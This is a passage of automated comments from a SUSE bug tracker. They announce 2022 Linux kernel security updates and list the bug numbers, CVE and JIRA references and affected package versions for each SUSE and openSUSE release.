CVE References: CVE-2021-26341,CVE-2021-33061,CVE-2021-4204,CVE-2021-44879,CVE-2021-45402,CVE-2022-0264,CVE-2022-0494,CVE-2022-0617,CVE-2022-1012,CVE-2022-1016,CVE-2022-1184,CVE-2022-1198,CVE-2022-1205,CVE-2022-1462,CVE-2022-1508,CVE-2022-1651,CVE-2022-1652,CVE-2022-1671,CVE-2022-1679,CVE-2022-1729,CVE-2022-1734,CVE-2022-1789,CVE-2022-1852,CVE-2022-1966,CVE-2022-1972,CVE-2022-1974,CVE-2022-1998,CVE-2022-20132,CVE-2022-20154,CVE-2022-21123,CVE-2022-21125,CVE-2022-21127,CVE-2022-21166,CVE-2022-21180,CVE-2022-21499,CVE-2022-2318,CVE-2022-23222,CVE-2022-26365,CVE-2022-26490,CVE-2022-29582,CVE-2022-29900,CVE-2022-29901,CVE-2022-30594,CVE-2022-33740,CVE-2022-33741,CVE-2022-33742,CVE-2022-33743,CVE-2022-33981,CVE-2022-34918
JIRA References: SLE-13513,SLE-13521,SLE-15442,SLE-17855,SLE-18194,SLE-18234,SLE-18375,SLE-18377,SLE-18378,SLE-18382,SLE-18385,SLE-18901,SLE-18938,SLE-18978,SLE-19001,SLE-19026,SLE-19242,SLE-19249,SLE-19253,SLE-19924,SLE-21315,SLE-23643,SLE-24072,SLE-24093,SLE-24350,SLE-24549
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.14.21-150400.24.11.1, kernel-64kb-5.14.21-150400.24.11.1, kernel-debug-5.14.21-150400.24.11.1, kernel-default-5.14.21-150400.24.11.1, kernel-default-base-5.14.21-150400.24.11.1.150400.24.3.6, kernel-docs-5.14.21-150400.24.11.1, kernel-kvmsmall-5.14.21-150400.24.11.1, kernel-obs-build-5.14.21-150400.24.11.1, kernel-obs-qa-5.14.21-150400.24.11.1, kernel-source-5.14.21-150400.24.11.1, kernel-syms-5.14.21-150400.24.11.1, kernel-zfcpdump-5.14.21-150400.24.11.1
SUSE Linux Enterprise Workstation Extension 15-SP4 (src):    kernel-default-5.14.21-150400.24.11.1
SUSE Linux Enterprise Module for Live Patching 15-SP4 (src):    kernel-default-5.14.21-150400.24.11.1, kernel-livepatch-SLE15-SP4_Update_1-1-150400.9.5.3
SUSE Linux Enterprise Module for Legacy Software 15-SP4 (src):    kernel-default-5.14.21-150400.24.11.1
SUSE Linux Enterprise Module for Development Tools 15-SP4 (src):    kernel-docs-5.14.21-150400.24.11.1, kernel-obs-build-5.14.21-150400.24.11.1, kernel-source-5.14.21-150400.24.11.1, kernel-syms-5.14.21-150400.24.11.1
SUSE Linux Enterprise Module for Basesystem 15-SP4 (src):    kernel-64kb-5.14.21-150400.24.11.1, kernel-default-5.14.21-150400.24.11.1, kernel-default-base-5.14.21-150400.24.11.1.150400.24.3.6, kernel-source-5.14.21-150400.24.11.1, kernel-zfcpdump-5.14.21-150400.24.11.1
SUSE Linux Enterprise High Availability 15-SP4 (src):    kernel-default-5.14.21-150400.24.11.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 7 Swamp Workflow Management 2022-07-26 16:23:47 UTC

SUSE-SU-2022:2549-1: An update that solves 11 vulnerabilities and has 49 fixes is now available.

Category: security (important)
Bug References: 1065729,1179195,1180814,1184924,1185762,1192761,1193629,1194013,1195504,1195775,1196901,1197362,1197754,1198020,1198924,1199482,1199487,1199489,1199657,1200217,1200263,1200343,1200442,1200571,1200599,1200600,1200604,1200605,1200608,1200619,1200622,1200692,1200806,1200807,1200809,1200810,1200813,1200816,1200820,1200821,1200822,1200825,1200828,1200829,1200925,1201050,1201080,1201143,1201147,1201149,1201160,1201171,1201177,1201193,1201222,1201644,1201664,1201672,1201673,1201676
CVE References: CVE-2021-26341,CVE-2021-4157,CVE-2022-1012,CVE-2022-1679,CVE-2022-20132,CVE-2022-20141,CVE-2022-20154,CVE-2022-29900,CVE-2022-29901,CVE-2022-33981,CVE-2022-34918
JIRA References: 
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.3.18-150300.59.87.1
openSUSE Leap 15.3 (src):    dtb-aarch64-5.3.18-150300.59.87.1, kernel-64kb-5.3.18-150300.59.87.1, kernel-debug-5.3.18-150300.59.87.1, kernel-default-5.3.18-150300.59.87.1, kernel-default-base-5.3.18-150300.59.87.1.150300.18.50.2, kernel-docs-5.3.18-150300.59.87.1, kernel-kvmsmall-5.3.18-150300.59.87.1, kernel-obs-build-5.3.18-150300.59.87.1, kernel-obs-qa-5.3.18-150300.59.87.1, kernel-preempt-5.3.18-150300.59.87.1, kernel-source-5.3.18-150300.59.87.1, kernel-syms-5.3.18-150300.59.87.1, kernel-zfcpdump-5.3.18-150300.59.87.1
SUSE Linux Enterprise Workstation Extension 15-SP3 (src):    kernel-default-5.3.18-150300.59.87.1, kernel-preempt-5.3.18-150300.59.87.1
SUSE Linux Enterprise Module for Live Patching 15-SP3 (src):    kernel-default-5.3.18-150300.59.87.1, kernel-livepatch-SLE15-SP3_Update_22-1-150300.7.5.1
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    kernel-default-5.3.18-150300.59.87.1
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    kernel-docs-5.3.18-150300.59.87.1, kernel-obs-build-5.3.18-150300.59.87.1, kernel-preempt-5.3.18-150300.59.87.1, kernel-source-5.3.18-150300.59.87.1, kernel-syms-5.3.18-150300.59.87.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    kernel-64kb-5.3.18-150300.59.87.1, kernel-default-5.3.18-150300.59.87.1, kernel-default-base-5.3.18-150300.59.87.1.150300.18.50.2, kernel-preempt-5.3.18-150300.59.87.1, kernel-source-5.3.18-150300.59.87.1, kernel-zfcpdump-5.3.18-150300.59.87.1
SUSE Linux Enterprise Micro 5.2 (src):    kernel-default-5.3.18-150300.59.87.1, kernel-default-base-5.3.18-150300.59.87.1.150300.18.50.2
SUSE Linux Enterprise Micro 5.1 (src):    kernel-default-5.3.18-150300.59.87.1, kernel-default-base-5.3.18-150300.59.87.1.150300.18.50.2
SUSE Linux Enterprise High Availability 15-SP3 (src):    kernel-default-5.3.18-150300.59.87.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 8 Swamp Workflow Management 2022-08-01 13:43:14 UTC

SUSE-SU-2022:2615-1: An update that solves 48 vulnerabilities, contains 26 features and has 202 fixes is now available.

Category: security (important)
Bug References: 1055117,1061840,1065729,1071995,1089644,1103269,1118212,1121726,1137728,1156395,1157038,1157923,1175667,1179439,1179639,1180814,1183682,1183872,1184318,1184924,1187716,1188885,1189998,1190137,1190208,1190336,1190497,1190768,1190786,1190812,1191271,1191663,1192483,1193064,1193277,1193289,1193431,1193556,1193629,1193640,1193787,1193823,1193852,1194086,1194111,1194191,1194409,1194501,1194523,1194526,1194583,1194585,1194586,1194625,1194765,1194826,1194869,1195099,1195287,1195478,1195482,1195504,1195651,1195668,1195669,1195775,1195823,1195826,1195913,1195915,1195926,1195944,1195957,1195987,1196079,1196114,1196130,1196213,1196306,1196367,1196400,1196426,1196478,1196514,1196570,1196723,1196779,1196830,1196836,1196866,1196868,1196869,1196901,1196930,1196942,1196960,1197016,1197157,1197227,1197243,1197292,1197302,1197303,1197304,1197362,1197386,1197501,1197601,1197661,1197675,1197761,1197817,1197819,1197820,1197888,1197889,1197894,1197915,1197917,1197918,1197920,1197921,1197922,1197926,1198009,1198010,1198012,1198013,1198014,1198015,1198016,1198017,1198018,1198019,1198020,1198021,1198022,1198023,1198024,1198027,1198030,1198034,1198058,1198217,1198379,1198400,1198402,1198412,1198413,1198438,1198484,1198577,1198585,1198660,1198802,1198803,1198806,1198811,1198826,1198835,1198968,1198971,1199011,1199024,1199035,1199046,1199052,1199063,1199163,1199173,1199260,1199314,1199390,1199426,1199433,1199439,1199482,1199487,1199505,1199507,1199605,1199611,1199626,1199631,1199650,1199657,1199674,1199736,1199793,1199839,1199875,1199909,1200015,1200019,1200045,1200046,1200144,1200205,1200211,1200259,1200263,1200284,1200315,1200343,1200420,1200442,1200475,1200502,1200567,1200569,1200571,1200572,1200599,1200600,1200608,1200611,1200619,1200692,1200762,1200763,1200806,1200807,1200808,1200809,1200810,1200812,1200815,1200816,1200820,1200822,1200824,1200825,1200827,1200828,1200829,1200830,1200845,1200882,1200925,1201050,1201160,1201171,1201177,1201193,1201196,1201218,1201222,1201228,1201251,150300
CVE References: CVE-2021-26341,CVE-2021-33061,CVE-2021-4204,CVE-2021-44879,CVE-2021-45402,CVE-2022-0264,CVE-2022-0494,CVE-2022-0617,CVE-2022-1012,CVE-2022-1016,CVE-2022-1184,CVE-2022-1198,CVE-2022-1205,CVE-2022-1508,CVE-2022-1651,CVE-2022-1652,CVE-2022-1671,CVE-2022-1679,CVE-2022-1729,CVE-2022-1734,CVE-2022-1789,CVE-2022-1852,CVE-2022-1966,CVE-2022-1972,CVE-2022-1974,CVE-2022-1998,CVE-2022-20132,CVE-2022-20154,CVE-2022-21123,CVE-2022-21125,CVE-2022-21127,CVE-2022-21166,CVE-2022-21180,CVE-2022-21499,CVE-2022-2318,CVE-2022-23222,CVE-2022-26365,CVE-2022-26490,CVE-2022-29582,CVE-2022-29900,CVE-2022-29901,CVE-2022-30594,CVE-2022-33740,CVE-2022-33741,CVE-2022-33742,CVE-2022-33743,CVE-2022-33981,CVE-2022-34918
JIRA References: SLE-13513,SLE-13521,SLE-15442,SLE-17855,SLE-18194,SLE-18234,SLE-18375,SLE-18377,SLE-18378,SLE-18382,SLE-18385,SLE-18901,SLE-18938,SLE-18978,SLE-19001,SLE-19026,SLE-19242,SLE-19249,SLE-19253,SLE-19924,SLE-21315,SLE-23643,SLE-24072,SLE-24093,SLE-24350,SLE-24549
Sources used:
openSUSE Leap 15.4 (src):    kernel-azure-5.14.21-150400.14.7.1, kernel-source-azure-5.14.21-150400.14.7.1, kernel-syms-azure-5.14.21-150400.14.7.1
SUSE Linux Enterprise Module for Public Cloud 15-SP4 (src):    kernel-azure-5.14.21-150400.14.7.1, kernel-source-azure-5.14.21-150400.14.7.1, kernel-syms-azure-5.14.21-150400.14.7.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 9 Swamp Workflow Management 2022-09-01 14:01:40 UTC

openSUSE-SU-2022:2549-1: An update that solves 11 vulnerabilities and has 49 fixes is now available.

Category: security (important)
Bug References: 1065729,1179195,1180814,1184924,1185762,1192761,1193629,1194013,1195504,1195775,1196901,1197362,1197754,1198020,1198924,1199482,1199487,1199489,1199657,1200217,1200263,1200343,1200442,1200571,1200599,1200600,1200604,1200605,1200608,1200619,1200622,1200692,1200806,1200807,1200809,1200810,1200813,1200816,1200820,1200821,1200822,1200825,1200828,1200829,1200925,1201050,1201080,1201143,1201147,1201149,1201160,1201171,1201177,1201193,1201222,1201644,1201664,1201672,1201673,1201676
CVE References: CVE-2021-26341,CVE-2021-4157,CVE-2022-1012,CVE-2022-1679,CVE-2022-20132,CVE-2022-20141,CVE-2022-20154,CVE-2022-29900,CVE-2022-29901,CVE-2022-33981,CVE-2022-34918
JIRA References: 
Sources used:
openSUSE Leap Micro 5.2 (src):    kernel-default-5.3.18-150300.59.87.1, kernel-default-base-5.3.18-150300.59.87.1.150300.18.50.2

Comment 10 Swamp Workflow Management 2022-09-01 14:13:48 UTC

openSUSE-SU-2022:2422-1: An update that solves 11 vulnerabilities and has 44 fixes is now available.

Category: security (important)
Bug References: 1065729,1179195,1180814,1184924,1185762,1192761,1193629,1194013,1195504,1195775,1196901,1197362,1197754,1198020,1198924,1199482,1199487,1199489,1199657,1200217,1200263,1200343,1200442,1200571,1200599,1200600,1200604,1200605,1200608,1200619,1200622,1200692,1200806,1200807,1200809,1200810,1200813,1200816,1200820,1200821,1200822,1200825,1200828,1200829,1200925,1201050,1201080,1201143,1201147,1201149,1201160,1201171,1201177,1201193,1201222
CVE References: CVE-2021-26341,CVE-2021-4157,CVE-2022-1012,CVE-2022-1679,CVE-2022-20132,CVE-2022-20141,CVE-2022-20154,CVE-2022-29900,CVE-2022-29901,CVE-2022-33981,CVE-2022-34918
JIRA References: 
Sources used:
openSUSE Leap Micro 5.2 (src):    kernel-default-5.3.18-150300.59.81.1, kernel-default-base-5.3.18-150300.59.81.1.150300.18.47.2

Comment 11 Swamp Workflow Management 2022-09-01 15:01:32 UTC

SUSE-SU-2022:2424-2: An update that solves 10 vulnerabilities, contains one feature and has 43 fixes is now available.

Category: security (important)
Bug References: 1065729,1179195,1180814,1184924,1185762,1192761,1193629,1194013,1195504,1195775,1196901,1197362,1197754,1198020,1198924,1199482,1199487,1199489,1199657,1200217,1200263,1200343,1200442,1200571,1200599,1200600,1200608,1200619,1200622,1200692,1200806,1200807,1200809,1200810,1200813,1200816,1200820,1200821,1200822,1200825,1200828,1200829,1200925,1201050,1201080,1201143,1201147,1201149,1201160,1201171,1201177,1201193,1201222
CVE References: CVE-2021-26341,CVE-2021-4157,CVE-2022-1012,CVE-2022-1679,CVE-2022-20132,CVE-2022-20154,CVE-2022-29900,CVE-2022-29901,CVE-2022-33981,CVE-2022-34918
JIRA References: SLE-15442
Sources used:
openSUSE Leap Micro 5.2 (src):    kernel-rt-5.3.18-150300.96.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.